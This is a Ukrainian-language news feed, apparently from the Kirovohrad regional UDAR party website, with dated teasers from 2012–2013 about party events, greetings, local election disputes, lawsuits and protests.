  21 лютого Кіровоградська обласна організація Політичної партії «УДАР Віталія Кличка» разом з Молодіжним крилом Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» та Офіційним фан-клубом братів Кличків,  до Дня рідної мови, ініціювали проведення акції «Наша мова - українська». Під час проведення акції ударівці зачитували для пересічних кіровоградців рядки з творів українських поетів та прозаїків, а також провели міні-тестування на знання рідної мови.   
21 Лютого 2013 +Коментар | подобається

  Сьогодні, 21 лютого, святкує свій День народження визначний політичний та громадський діяч, Голова Кіровоградської міської організації Політичної партії «УДАР Віталія Кличка» Ігор Козуб.  
21 Лютого 2013 +Коментар | подобається

  Вже майже три тижні минуло з моменту проведення проміжних виборів до Кіровоградської обласної ради по мажоритарному округу № 17 (Компанієвський район). Нагадаємо, що  з різницею в 207 голосів перемогу здобув представник опозиції Олександр Шевчук. Вибори пройшли, ажіотаж не зник. А все тому, що офіційних результатів виборів ми не маємо й понині, адже територіальна виборча комісія ніяк не може зібратись на силі підбити всім уже відомі підсумки та оголосити результати.   
21 Лютого 2013 +Коментар | подобається

17 лютого  в Україні відзначали Міжнародний день спонтанного прояву доброти. Це, відносно «молоде» свято, засноване за ініціативою міжнародних благодійних організацій, що вирішили об'єднати під гаслами доброти всіх людей планети, незалежно від їх громадянства, віросповідання та національної приналежності.
19 Лютого 2013 +Коментар | подобається

Сьогодні, о 9 годині представники опозиційних сил Кіровограду та Компаніївського району зібрались під Кіровоградською облдержадміністрацією з вимогою завершити виборчий процес на Компаніївщині та, нарешті, оголосити офіційні результати виборів. 
15 Лютого 2013 +Коментар | подобається

  На день св.Валентина в Світловодському професійно-технічному училищі №5 відбувся концерт, де місцева та районна організації партії УДАР Віталія Кличка нагородила солодощами переможців у конкурсі на кращу валентинку.
15 Лютого 2013 +Коментар | подобається

Останнім часом зусібіч чутно запитання: «Чому ж «УДАР» блокує триубуну у Верховній Раді України». Політична партія «УДАР Віталія Кличка» бажає відповісти на питання громадськості та надати повну інформацію стосовно своїх дій.
15 Лютого 2013 +Коментар | подобається

Знову неспокійно на Компаніївщині, знову голосно лунають заклики палити адміністрацію, брати владу на вила та різні «міцні» народні вирази стосовно диктатури діючої влади.Нагадаємо, що за результатам проміжних виборів до Кіровоградської обласної ради по одномандатному виборчому округу №17 (Компаніївський район), впевнену перемогу здобув Шевчук Олександр Миколайович. Це саме та людина, на підтримку якої Кіровоградська обласна організація Політичної партії «УДАР Віталія Кличка» відкликала свого кандидата – відомого суспільного діяча та музиканта Манженка Євгена Івановича.
15 Лютого 2013 +Коментар | подобається

Технологія опрацьована провладними чиновниками на виборах до Верховної Ради України працює й понині. Даний факт, на жаль, в черговий раз підтвердився після проведення, 3 лютого 2013 року, проміжних виборів до Кіровоградської обласної ради по одномандатному виборчому округу №17 (Компаніївський район).

  Темою для обговорення більшості всукраїнських ЗМІ цього тижня стала парламетська криза. У відповідь на небажання провладних депутатів голосувати особисто, а продовжувати практику кнопкодавства «УДАР Віталія Кличка» виступив з чіткими вимогами.   

  Не так давно зміни графіку руху на маршруті № 274 призвели до прогнозованого та зрозумілого обурення жителів селища Нового, які змушені тепер вистоювати по півгодини на зупинках, щоб дочекатись автобуса. Проте, як виявилось, це був лише перший крок до нового «покращення» життя новенців. Наступним на шляху до світлого майбутнього стало прийняття 30 січня на засіданні виконавчого комітету Кіровоградської міської ради змін до чинної мережі автобусних маршрутів громадського користування.   

Кіровоградська обласна організація Політичної партії «УДАР Віталія Кличка» в особі голови організації Анатолія Ревенка від усього серця бажає Вам міцного здоров'я та життєвої наснаги, професійних успіхів та особистих творчих досягнень, сімейного щастя, злагоди та добробуту у Вашій оселі! Нехай здійсняться усі заповітні мрії, а будь-які повороти долі завжди відкривають лише нові обрії майбутніх перспектив! Щастя Вам, радості, добра і благополуччя шановні однопартійці! 

  Міністерство освіти і науки, молоді та спорту України не стоїть на місці щодо покращення навчального процесу у школах та здійснення моніторингу діяльності загальноосвітніх навчальних закладів. Одним з останніх нововведень є, безперечно, цікавий проект рейтингового оцінювання шкіл, що вже цьогоріч має на повну запрацювати на теренах нашої Батьківщини. З метою впровадження в життя власних ініціатив чиновники Міносвіти розробили та упровадили в дію наказ № 1343 від 22 листопада 2011 року «Про затвердження Критеріїв системи рейтингового оцінювання діяльності загальноосвітніх навчальних закладів».  

Сьогодні святкує своє 55-тиріччя депутат Верховної Ради України, член Політичної партії «УДАР Віталія Кличка» Едуард Йосипович Гурвіц!

Учора, 29 січня, близько двохсот чоловік вшанували пам’ять героїв Крут, пройшовшись центральною частиною міста  зі свічками в руках. У заході прийняли участь активісти «УДАРу», «Свободи» та просто небайдужі мешканці міста.

Сьогодні святкує свій День народження прекрасна людина, Голова Вільшанської районної організації Політичної партії «УДАР Віталія Кличка» Харковенко Наталія Іванівна!

Починаючи з 90-х, громадськість Кіровограда, а точніше певні її кола, неодноразово підіймали питання про зміну нинішньої, начебто заідеологізованої, радянської, назви міста та повернення історичної – Єлисаветград. 

Сьогодні, як завжди, їдучи в автобусі маршруту № 274 на роботу, зауважив дивні наліпки «Безкоштовна wi-fi- зона» на боках транспортного засобу. 

Сьогодні святкує свій День народження чудова людина, активістка Молодіжного крила Політичної партії «УДАР Віталія Кличка» Філіпенко Ірина!

  Сьогодні, 22 січня 2013 року, відбувся круглий стіл «Суди Кіровоградщини очима кіровоградців», під час якого було представлено результати досліджень якості роботи судів Кіровоградської області з погляду їх відвідувачів.    

Сьогодні святкує свій День Народження прекрасна людина, професіонал з великої літери, ативіст Політичної партії "УДАР Віталія Кличка" - Гордієнко Олена Вікторівна!

Політична парітя «УДАР Віталія Кличка» відповідально ставиться до покладених на неї обов’язків та не дозволить приймати антиукраїнські закони, практикувати «кнопкодавство» та ігнорувати вимоги парламентарів дотримуватись під час проведення голосування Конституції України. Тож Головою Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» Ревенком Анантолієм Дмитровичем було направлено два адміністративні позови до Окружного адміністративного суду м.Києва та Вищого адміністративного суду України.

97 років тому, на Софіївській площі в Києві, було проголошено АКТ об’єднання Української Народної Республіки та Західноукраїнської Народної Республіки задля створення єдиної (соборної) української держави. 

22 січня 1919 року відбулося проголошення Акту воз'єднання Української Народної Республіки і Західноукраїнської Народної Республіки для утворення єдиної (соборної) української держави. Передувало цій події прийняття IV Універселу УЦР, яким проголошувалася повна незалежність УНР. 

Кіровоградська обласна організація Політичної партії «УДАР Віталія Кличка» в особі голови організації Анатолія Ревенка від усього серця бажає Вам міцного здоров'я та життєвої наснаги, професійних успіхів та особистих творчих досягнень, сімейного щастя, злагоди та добробуту у Вашій оселі! Нехай здійсняться усі заповітні мрії, а будь-які повороти долі завжди відкривають лише нові обрії майбутніх перспектив! Щастя Вам, радості, добра і благополуччя шановні однопартійці! 

В День Святого Водохреща представники Кіровоградської обласної організації політичної партії "УДАР Віталія Кличка" взяли участь у традиційному Хрещенському купанні.

  На початку 2013 року всі міністерства та відомства  підбивають підсумки року, що минув. Не стала винятком і Державна податкова служба в Кіровоградській області, що зовсім недавно увійшла до щойно створеного Міністерства доходів і зборів України. А 17 січня голова ДПС у Кіровоградській області Ігор Вірієнко провів прес-конференцію для підбиття підсумків торішньої діяльності податківців.   

  Минуло вже більше двох місяців після оголошення результатів виборів до Верховної ради України 2012 року і Політична партія «УДАР Віталія Кличка» вважає за необхідне відзвітувати виборцям за пророблену роботу.  

  Сьогодні, на 62-му році життя помер Валерій Михайлович Репало – перший голова Кіровоградської обласної організації Української Народної партії, кандидат економічних наук, один із засновників та керівників обласної організації Народного руху України, активний учасник клубу «Перевесло», екс-заступник голови Кіровоградської ОДА (1992-1996 роки). Керівництво Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» висловлює щире співчуття родині та близьким покійного.    

Понеділок, як відомо, день не з простих. Початок робочого тижня, та ще й після стількох свят… Багато хто з кіровоградців мріяв просто полежати на дивані, проте Кіровоградський осередок Молодіжного крила Політичної партії «УДАР Віталія Кличка» вирішив цього дня нагадати жителям та гостям міста про небайдужість до долі ближніх, організувавши акцію «Здай кров – урятуй людину!». 

Кіровоградська обласна виборча комісія зареєструвала Манженка Євгена Івановича кандидатом в депутати Кіровоградської обласної Ради.

  Близько двох місяців тому, а саме наприкінці листопада, Кіровоград бурхливо обговорював одну новину, що стала топовою  у ЗМІ, –  можливу відставку, а точніше перехід на нову посаду голови Кіровоградської облдержадміністрації Сергія Ларіна.   

  Кіровоградська обласна організація Політичної партії «УДАР Віталія Кличка» в особі голови організації Анатолія Ревенка від усього серця бажає Вам міцного здоров’я та життєвої наснаги, професійних успіхів та особистих творчих досягнень, сімейного щастя, злагоди та добробуту у Вашій оселі! Нехай здійсняться усі заповітні мрії, а будь-які повороти долі завжди відкривають лише нові обрії майбутніх перспектив! Щастя Вам, радості, добра і благополуччя шановні однопартійці!  

  Усіх цікавлять новини. Хтось отримує інформацію з телевізійних передач, хтось із радіо, дехто з Інтернету. Останнім часом, переглядаючи свіжу пресу, зауважив тенденцію, що не може не тішити мене як представника молодшого, відносно нинішнього політикуму, покоління.   

  Сьогодні, як завжди, добираючись на роботу, із здивуванням усвідомив, що вже другий день не можу потрапити на звичний рейс. Більшість кіровоградців не здивувалась би цьому факту, але не жителі селища Нового, що добираються із нього в інші частини міста та навпаки автобусами маршруту № 274, які завжди ходили за розкладом.      

В п’ятницю, 4 січня 2013 року, відбулась Конференція Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка». Порядок денний містив ряд важливих питань, серед яких - висунення кандидата в депутати по одномандатному мажоритарному виборчому округу  №17 на проміжних виборах до Кіровоградської обласної ради.

  Напередодні свят хотів би привітати всіх мешканців Кіровоградщини з прийдешнім Новим роком і Різдвом Христовим, побажати здоров’я, творчої наснаги та здійснення бажань. Дякую нашим прихильникам за довіру. Обіцяю, ми вас не підведемо!  
30 Грудня 2012 +Коментар | подобається

  Сьогодні, 28 грудня 2012 року, керівник Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» Анатолій Ревенко виступ в ролі Діда Мороза, та відвідав з вітаннями та подарунками два будинки сімейного типу родин Гаркуша та Дерев’янко.   
29 Грудня 2012 +Коментар | подобається

27 грудня 2012 року о 17.00 відбулась Конференція Кіровоградської міської організації Політичної партії «УДАР Віталія Кличка». 
28 Грудня 2012 +Коментар | подобається

Цього тижня, починаючи з 24 грудня, керівництво Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» на чолі з її головою Анатолієм Дмитровичем Ревенком провело низку зустрічей з партактивом та членами партії «УДАР Віталія Кличка», які були задіяні під час проведення виборчої кампанії 2012 року до Верховної Ради України.
27 Грудня 2012 +Коментар | подобається

  26 грудня 2012 року відбулися збори за участю інститутів громадянського суспільства задля обрання нового складу Громадської ради при Кіровоградській облдержадміністрації. Участь у них взяв і член Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка», депутат Кіровоградської міської ради, представник Кіровоградської обласної громадської організації «Комітет відновлення історичної справедливості» Дмитро Віталійович Хох.   
27 Грудня 2012 +Коментар | подобається

Сьогоді, 26 грудня 2012 року, виповнюється 35 років чудовій людині, телеведучому "Ранкової кави", фронтмену гурту "Веселі біоритми", члену Політичної партії "УДАР Віталія Кличка" Євгенові Манженку. 
26 Грудня 2012 +Коментар | подобається

Учора, 25 грудня 2012 року, відбулась зустріч між першим заступником голови Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» Козубом Ігорем Борисовичем та головою Кіровоградської обласної організації Всеукраїнське об’єднання ветеранів Голець Іваном Федоровичем. 
26 Грудня 2012 +Коментар | подобається

  Сьогодні, 21 грудня 2012 року, кіровоградські активісти партії «УДАР Віталія Кличка» долучились до ходи «Марш проти зради», метою якого було висловлення протесту проти зради народних депутатів Андрія та Олександра Табалова  і їх відмови ввійти до фракції Об’єднаної опозиції у Верховній Раді України.   
21 Грудня 2012 +Коментар | подобається

 21 грудня 2012 року з 12 до 13 години відбудеться хода  під назвою «Марш проти зради», метою якого є висловлення протесту виборців проти зради народних депутатів Андрія та Олександра Табалових і їх відмови ввійти у фракцію Об'єднаної опозиції у Верховній Раді України.    
20 Грудня 2012 +Коментар | подобається

  Як, мабуть, пам’ятають постійні читачі, 20 квітня 2012 року на нашому сайті було оприлюднено статтю голови Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» Анатолія Ревенка «Ще раз про корупцію на периферії».    
19 Грудня 2012 +Коментар | подобається

  Учора, 16 грудня 2012 року, кіровоградські активісти партії «УДАР Віталія Кличка», на чолі з першим заступником обласної організації партії Козубом Ігорем Борисовичем, приєдналися до близько сотні вірян та активістів для чергування біля Святоволодимирівського храму, що в Новоархангельську, очікуючи силового захоплення церковної споруди представниками Московського патріархату.  
17 Грудня 2012 +Коментар | подобається

  Учора, 13 грудня 2012 року, у приміщенні Кіровоградської регіональної торгово-промислової палати відбулось відкрите засідання Кіровоградського обласного осередку Всеукраїнського об’єднання підприємців малого та середнього бізнесу «Фортеця» під головуванням Юлії Вікторівни Шкурупій. Варто відзначити, що на заклик до співпраці відгукнулись не лише представники бізнесових кіл, а й громадські організації.  
14 Грудня 2012 +Коментар | подобається

  Учора, 11 грудня 2012 р., Кіровоградська міська рада прийняла рішення «Про надання згоди на передачу комунального закладу «Кіровоградська станція швидкої медичної допомоги» у спільну власність територіальних громад сіл, селищ і міст Кіровоградської області». Як заспокоїли нас народні обранці, жодних скорочень у зв’язку з даною реформою не відбудеться.    
12 Грудня 2012 +Коментар | подобається

Як, певно, знають шановні читачі, учора, десятого грудня, весь світ відзначив Міжнародний день захисту прав людини. Привітанням з нагоди даного свята і розпочав свій виступ на першій, після повернення з відпустки, апаратній нараді голова Кіровоградської обласної державної адміністрації Сергій Ларін.   
11 Грудня 2012 +Коментар | подобається

  7 грудня 1990 року, Верховна Рада України ухвалила Закон України «Про місцеве самоврядування», цей без сумніву важливий крок в історії незалежної України став підставою для встановлення згідно з Указу Президента України від 25.11.2000 р. святкування 7 грудня Дня місцевого самоврядування.  

  Учора, 6 грудня 2012 року, представники Кіровоградської обласної та міської організацій партії «УДАР Віталія Кличка» Ярослав Безменов та Павло Лісниченко взяли учать в інформаційному семінарі з питань нових процедур реєстрації організацій громадянського суспільства, що пройшов у приміщенні Управління МВС в Кіровоградській області.   

  В п’ятницю, 30 листопада 2012 року, активістами молодіжного крила нашої партії під стінами Управління СБУ в Кіровоградській області було проведено акцію «Порушники в законі», під час якої було розгорнуто банер зі світлинами порушників правил дорожнього руху та роздано листівки з витягом з тих же правил.   

Чи все було завершено до урочистого відкритття реконструйованого приміщення Кіровоградського музично-драматичного театру ім. М.Л.Кропивницького?
28 Листопада 2012 +Коментар | подобається

Сьогодні Кіровоградська міська організація партії «УДАР Віталія Кличка» долучилася до всеукраїнської громадської ініціативи «Горнята для малят»
27 Листопада 2012 +Коментар | подобається

Як і вся Україна, 24 листопада Кіровоградщина сумувала за померлими у жахливі голодні роки Голодоморів. По всій області у заходах пам’яті взяли участь члени партії «УДАР Віталія Кличка».
26 Листопада 2012 +Коментар | подобається

24 листопада 2012 року в місті Олександрія біля меморіалу жертвам голодомору в Україні члени та прихильники ПП «УДАР Віталія Кличка» запалили свічки в знак пам’яті про той страшний період в історії нашого народу.
25 Листопада 2012 +Коментар | подобається

«УДАР» розглядає можливість участі в об’єднанні «Кіровоград – наше рідне місто» виключно  після спільного узгодження мети, цілей, завдань, ідеологічної спрямованості та персонального складу такого об’єднання.
19 Листопада 2012 +Коментар | подобається

Кіровоградські "УДАРівці" в неофіційній обстановці відсвяткували успішне завершення виборчої кампанії 2012-го року. Керівництво обласної організації відзначило найкращик почесними грамотами та цінними подарунками.
16 Листопада 2012 +Коментар | подобається

Кіровоградські "УДАРівці" взяли участь у захисті результатів виборів під стінами ЦВК.
15 Листопада 2012 +Коментар | подобається

  Станом на 30 жовтня по 99 округу, з центром в місті Кіровоград, лідирує кандидат від «Об’єднаної опозиції» Андрій Табалов. Він майже на 3% випереджає кандидата від влади Олександра Шаталова.  
30 Жовтня 2012 +Коментар | подобається

Ні для кого не секрет, що в деяких навчальних закладах, в яких працюють виборчі дільниці, на наступний після виборів день оголошують вихідний.
27 Жовтня 2012 +Коментар | подобається

Вранці 29 вересня на гарячу лінію окружного виборчого штабу надійшло повідомлення, що на одній з дільниць (№350867) члени комісії від опозиційних сил та спостерігачі не можуть отримати протоколи. 
29 Жовтня 2012 +Коментар | подобається

Вчора в Кіровограді поширювали газету «Народний трибунал», яка була присвячена поливанню брудом політичної партії «УДАР Віталія Кличка».
27 Жовтня 2012 +Коментар | подобається

25 жовтня 2012 року в Олександрії та Знам’янці відбулись зустрічі з третім номером виборчого списку партії «УДАР Віталія Кличка», колишнім очільником СБУ, людиною, яка відкрила засекречені  архіви для істориків та науковців, моральним авторитетом - Валентином Наливайченком.
25 Жовтня 2012 +Коментар | подобається

Звернення кандидата в народні депутати України від Політичної партії           « УДАР Віталія Кличка » по мажоритарному  округу  № 103  Костянтина Ліщенка
24 Жовтня 2012 +Коментар | подобається

Народ вже втомився від золотих унітазів в будинках посадовців, від «засівання» кабінетів суддів та прокурорів доларовими купюрами, від того, що чиновник вважає простих людей не тільки своїми слугами, а й тими, хто повинен поповнювати його кишені. Настав час покінчити з цим. Настав час «УДАРу»!
23 Жовтня 2012 +Коментар | подобається

У серпні цього року партія «УДАР» здивувала кіровоградський політикум своїм несподіваним рішенням висунути кандидатом в депутати молодого письменника і мандрівника Максима Кідрука.
23 Жовтня 2012 +Коментар | подобається

18 жовтня юристи кіровоградського регіонального штабу дізнались про те, що на кандидата в народні депутати по 99 округу від партії «УДАР» Максима Кідрука було подано до суду.
20 Жовтня 2012 +Коментар | подобається

Нещодавно «УДАР» отримав кілька позовів від партії Регіонів. Відповідачем було заявлено кандидата по 101 округу від нашої політичної сили Олега Діденка.
16 Жовтня 2012 +Коментар | подобається

14 жовтня відбувся другий етап Х З’їзду партії «УДАР Віталія Кличка». Саме на ньому наша політична сила виконала обіцянку зняти своїх кандидатів на користь кандидатів від «Об’єднаної опозиції» та опозиційних самовисуванців в тих округах, де вони мають більший рейтинг.
15 Жовтня 2012 +Коментар | подобається

  Саме такими словами розпочав прес-конференцію 11 жовтня кандидат в народні депутати України по 99 виборчому округу, письменник і мандрівник, «УДАРівець» Максим Кідрук.   
11 Жовтня 2012 +Коментар | подобається

  11 жовтня представники політичної партії «УДАР Віталія Кличка» взяли участь у зустрічі з фермерами Бобринецького району.    
11 Жовтня 2012 +Коментар | подобається

До обласної організації політичної партії «УДАР (Український Демократичний Альянс за Реформи) Віталія Кличка» надійшов ряд скарг від працівників освіти Устинівського району.
10 Жовтня 2012 +Коментар | подобається

  21 вересня за ініціативи Гайворонського районного виборчого штабу партії «УДАР Віталія Кличка» та особисто Олега Діденка, кандидата в народні депутати по 101 округу, було проведено екологічну акцію по очищенню берега річки Південний Буг.  

Минулого тижня юристами Кіровоградського регіонального штабу було подано два судові позови на кандидатів від Партії Регіонів Станіслава Березкіна та Сергія Кузьменка.

  28 вересня 2012р. у кіровоградському прес-клубі відбувся дебат-клуб з кандидатами в народні депутати від Кіровоградщини. Захід відбувався за ініціативи кіровоградської платформи руху «Чесно»

Одразу декілька замовних статей з’явилося в регіональних виданнях цього тижня. Усі вони спрямовані на дискредитацію політичної партії «УДАР Віталія Кличка» та її лідера.
28 Вересня 2012 +Коментар | подобається

Два дні тому на найпопулярнішому інтернет-ресурсі області «Весь Кіровоград» були оприлюднені результати соцопитування, проведеного «Центром регіональних досліджень». 

  Почнемо розповідь із п’яти тисяч гривень. Саме стільки коштує операція на очах для жительки нашого міста Гладун Галини Григорівни.  

27 вересня в кіровоградському будинку проф-спілок пройшла зустріч Оксани Продан з виборцями. На зустріч з четвертим номером списку прийшло близько 350 кіровоградців.
28 Вересня 2012 +Коментар | подобається

27 вересня в кіровоградському «Прес-клубі» відбулась прес-конференція 4 номера виборчого списку партії «УДАР Віталія Кличка», лідера Всеукраїнського об’єднання «Фортеця», організатором податкового майдану Оксаною Продан. 
27 Вересня 2012 +Коментар | подобається

  Рейтинги «УДАРу» постійно зростають, про це свідчать і результати опитувань і те, що кандидати-одномандатники від інших партії, а також самовисуванці постійно заявляють про те, що після проходження їх в парламент, вони увійдуть до складу фракції «УДАР».  
26 Вересня 2012 +Коментар | подобається

  Завтра о 12.45, в приміщенні Прес-клубу відбудеться прес-конференція одного з лідерів партії «УДАР», четвертого номера виборчого списку партії, лідера Податкового майдану, чудової жінки – Оксани Продан.  
26 Вересня 2012 +Коментар | подобається

  24 вересня о 17-00 в Кіровограді, в парку Пушкіна (на Козачому острові) відбулась унікальна, але вже традиційна акція – День яйця.  
24 Вересня 2012 +Коментар | подобається

  Сьогодні, 24 вересня о 11-00, на площі Кірова в обласному центрі відбулася акція протесту громадських організацій, що представляють в області чорнобильців. Люди, які, без перебільшення, врятували життя і здоров’я нації, вимагали від влади виконання «чорнобильських» законів.   
24 Вересня 2012 +Коментар | подобається

До Дня міста Кіровограда, 23 вересня, в кіровоградському дендропарку пройшли дитячі велосипедні перегони «РоверОК-2», підтримані Кіровоградською обласною організацією політичної партії «УДАР Віталія Кличка» та особисто головою організації Анатолієм Ревенком.
23 Вересня 2012 +Коментар | подобається

За результатами більшості соціологічних опитувань єдиною політичною силою, яка продовжує збільшувати свої результати є «УДАР Віталія Кличка». Деякі контори показують рейтинг нашої політичної сили майже 16 %.
20 Вересня 2012 +Коментар | подобається

  13 вересня в місті Олександрія представник політичної партії «УДАР» – кандидат в депутати Світлана Віряскіна взяла участь у акції протесту, яка була ініційована лідером правозахисного руху «Взаємодопомога» Медведем за підтримки місцевих осередків політичних структур «ВО Батьківщина», «КПУ» та окремих самовисуванців.   
17 Вересня 2012 +Коментар | подобається

  13 вересня постановою Кіровоградського окружного адміністративного суду було відмовлено в задоволенні позову політичної партії «УДАР (Український Демократичний Альянс за Реформи) Віталія Кличка» до голови Кіровоградської обласної державної адміністрації Ларіна Сергія Миколайовича.  
15 Вересня 2012 +Коментар | подобається

12 вересня в Кіровограді перебуває лідер політичної партії «Україна – вперед!» Наталія Королевська та одне з облич її передвиборчої кампанії, відомий футболіст Андрій Шевченко.
12 Вересня 2012 +Коментар | подобається

  Не секрет, що більшість з регіональних ЗМІ повністю підконтрольні владі. Кіровоградщина не стала винятком.   
12 Вересня 2012 +Коментар | подобається

  Внаслідок прийняття непродуманого рішення, а саме відміни приміського потягу сполученням «Олександрія-Помічна», найбільш незахищені верстви населення втратили можливість швидко та недорого дістатися до місця роботи, навчання чи проживання. Людей позбавили єдиного альтернативного засобу пересування в напрямку Кіровограда.  
11 Вересня 2012 +Коментар | подобається

  8 вересня вся Україна чекала на бій Віталія Кличка з Мануелем Чарром. Кіровоградщина також не лишилась осторонь цієї події. Силами Кіровоградської обласної організації було організовано 7 фан-зон: 4 в Кіровограді, а також в Олександрії, Знам’янці та Голованівську.  
9 Вересня 2012 +Коментар | подобається

8 вересня у Знам’янському парку відпочинку міська організація політичної партії «УДАР Віталія Кличка», під керівництвом голови міської організації Корчинського Максима, та її окружний виборчий штаб, під керівництвом Олега Демьяненка, влаштували фан-зону.
10 Вересня 2012 +Коментар | подобається

Уявіть: Ви вискакуєте з маршрутки під номером п’ятдесят і від вулиці Шевченка поспіхом прямуєте до площі Кірова.
7 Вересня 2012 +Коментар | подобається

Вісім років тому, в 2004-му, восени розпочався тиск на єдиний тоді опозиційний – «5-й канал».
7 Вересня 2012 +Коментар | подобається

Нещодавно до Олександрійської організації партії «УДАР» надійшла анкета про вступ до лав нашої політичної сили від Ноженко Євдокії Фомівни. 
4 Вересня 2012 +Коментар | подобається

3 вересня 2012 року на адресу Кіровоградської організації надійшов лист від обласного осередку громадського об’єднання «Фортеця».
4 Вересня 2012 +Коментар | подобається

«Чорний піар» проти «УДАРу» працює вже давно. Але Кіровоградські кандидати мажоритарники стикнулися з ним тільки зараз. 
4 Вересня 2012 +Коментар | подобається

В понеділок, 3 вересня об 11 годині, в приміщенні Прес-клубу відбулася прес-конференція депутатів місцевих рад від партії «УДАР Віталія Кличка». 
3 Вересня 2012 +Коментар | подобається

1-го вересня в День Знань на адресу Кіровоградської обласної організації Політичної партії «УДАР Віталія Кличка» прийшов лист від обласного осередку громадської організації «Національний Альянс». 
3 Вересня 2012 +Коментар | подобається

  Цього тижня в 7 районах Кіровоградської області відбулись зустрічі з активними виборцями, організовані партією «УДАР Віталія Кличка». Такі заходи пройшли в Компаніївці, Бобринці, Устинівці, Новоукраїнці, Добровеличківці, Знам`янці та Олександрії.  
3 Вересня 2012 +Коментар | подобається

Кілька днів тому Кабінет міністрів України спустив у регіони чергову ініціативу зверху. Віднині чисті корови з «огромним вимєнєм» (с), прописані в Україні загалом та на Кіровоградщині зокрема, даватимуть молоко не дешевше за дві гривні двадцять копійок за літр.
1 Вересня 2012 +Коментар | подобається

Письменник Максим Кідрук, кандидат у народні депутати України від партії «УДАР Віталія Кличка» по 99 округу,  окрім своїх творів, став відомим в Україні і як борець з корупцією в країнах Східної Африки.
31 Серпня 2012 +Коментар | подобається

Рішенням Знам’янської міської ради ліквідовано комунальне підприємство теплових мереж, яке забезпечувало теплом житлові будинки, дитсадки, школи, інші заклади.
31 Серпня 2012 +Коментар | подобається

В понеділок, 3 вересня об 11 годині, в приміщенні Кіровоградського прес-клубу (вул. 50 років Жовтня, 1а, вхід у ТЦ \\\"Копілка\\\" - від магазину \\\"Строй Двор\\\") відбудеться прес-конференція депутатів місцевих рад від партії «УДАР Віталія Кличка».
31 Серпня 2012 +Коментар | подобається

28 серпня відбулась прес-конференція начальника управління з питань надзвичайних ситуацій та у справах захисту населення від наслідків Чорнобильської катастрофи ОДА В. Жука, в якій взяв участь і перший заступник голови обласної ради О. Шаталов.
29 Серпня 2012 +Коментар | подобається

У часи, коли молодь кинута державою напризволяще, коли в країні практично відсутні будь-які «молодіжки», уся надія – на свідомих молодих людей, які працюють на благо своїх однолітків. 
29 Серпня 2012 +Коментар | подобається

  Російська мова стала регіональною мовою в районному центрі Кіровоградщини – Знам’янці. Рішення було прийнято на сесії міської Ради і оприлюднене на  сайті. 
28 Серпня 2012 +Коментар | подобається

23 серпня 2012 року кандидат в народні депутати по 99 виборчому округу від партії «УДАР Віталія Кличка» Максим Кідрук подав позов до Кіровоградського окружного Адміністративного суду. 
23 Серпня 2012 +Коментар | подобається

  Активісти Кіровоградської обласної організації політичної партії «УДАР (Український Демократичний Альянс за Реформи) Віталія Кличка» провели флеш-моб, присвячений двадцять першій річниці Незалежності. Акцію провели в рамках загальноукраїнського проекту «Очистимо країну» сьогодні о 15:30 в Центральному сквері міста Кіровограда.            
27 Серпня 2012 +Коментар | подобається

21 серпня 2012 року у Господарському суді міста Кіровограда відбулось судове засідання у справі про захист честі, гідності та ділової репутації та спростування недостовірної інформації, за позовом Кіровоградської обласної організації Партії Регіонів до молодіжного он-лайн журналу «Гречка».
21 Серпня 2012 +Коментар | подобається

Станом на 20 серпня 2012 року в Кіровоградській області відкрито 27 громадських приймалень Політичної партії «УДАР Віталія Кличка». Всі приймальні працюють з 9.00 до 18.00.
20 Серпня 2012 +Коментар | подобається

  17  серпня 2012 року Кіровоградська обласна організація Партії ветеранів Афганістану  заявила про підтримку «УДАРу» на виборах до Верховної Ради України. Також афганці наголосили на тому, що на їх підтримку можуть розраховувати і депутати-мажоритарники, яких висуває наша політична сила в п’ятьох одномандатних округах області.  
19 Серпня 2012 +Коментар | подобається

До виборів лишилось майже три місяці. Рейтинги більшості політичних сил продовжують падати. Єдина партія, яка продовжує набирати політичні симпатії це «УДАР Віталія Кличка».
16 Серпня 2012 +Коментар | подобається

15 серпня 2012 року Кіровоградська обласна організація \\\"Комітет Відновлення Історичної Справедливості\\\" (КВІС)  заявила про підтримку кандидатів від партії «УДАР Віталія Кличка». 
15 Серпня 2012 +Коментар | подобається

Кіровоградська обласна організація політичної партії «УДАР (Український Демократичний Альянс за Реформи) Віталія Кличка» рішуче засуджує судові переслідування незалежних ЗМІ Партією Регіонів та висловлює свою підтримку виданню «Кіровоградська правда» і особисто Івану Герасименку.
16 Серпня 2012 +Коментар | подобається

  11 серпня 2012 року в селі Созонівка відбулось спортивне свято на звання «Найспортивнішого села Кіровоградського району». Захід пройшов у рамках Всеукраїнських сільських спортивних ігор “Краще спортивне село України 2012″.  
13 Серпня 2012 +Коментар | подобається

  Найбільше тиску відчувають саме представники та кандидати в народні депутати від політичної партії «УДАР Віталія Кличка». Адже ми є головними супротивниками не лише для партії влади, а й для «об’єднаної опозиції». Не зважаючи на те, що опозиція задекларувала принципи взаємодії та взаємонепоборення з партією «УДАР», наші кандидати постійно стикаються з чорним піаром, замовними статтями та брудом, які викидають у пресу наші колеги.  
11 Серпня 2012 +Коментар | подобається

9 серпня цього року молодіжним онлайн-журналом «Гречка», який по-суті є єдиним опозиційним медіа-ресурсом регіону, оприлюднена заява про тиск на видання з боку Партії регіонів.

Кандидат від політичної партії «УДАР (Український Демократичний Альянс за Реформи) Віталія Кличка» по 100-му мажоритарному округу Євген Манженко долучився до громадської акції протесту проти коментування Олімпійських ігор в Лондоні російською мовою Першим національним каналом українського телебачення.

  Рада Кіровоградської обласної організації політичної партії «УДАР (Український Демократичний Альянс за Реформи) Віталія Кличка» на засіданні від шостого серпня цього року задовольнила заяви про вихід зі своїх рядів Кузьменко Галини  Іванівни та Крюкова Віктора Васильовича.  

У Кіровограді, в рамках презентації «Чеснометра», відбулася зустріч лідерів політичних сил області, громадських активістів та преси з координатором Всеукраїнського руху «ЧЕСНО» Олегом Рибачуком та обласними представниками цієї кампанії.

Кожного кандидата по мажоритарному округу голосували окремо на З’їзді партії, який відбувся 1 серпня. Всі мажоритарники від «УДАРу» отримали майже одноголосну підтримку, після чого виголосили присягу кандидата – «УДАРівця».

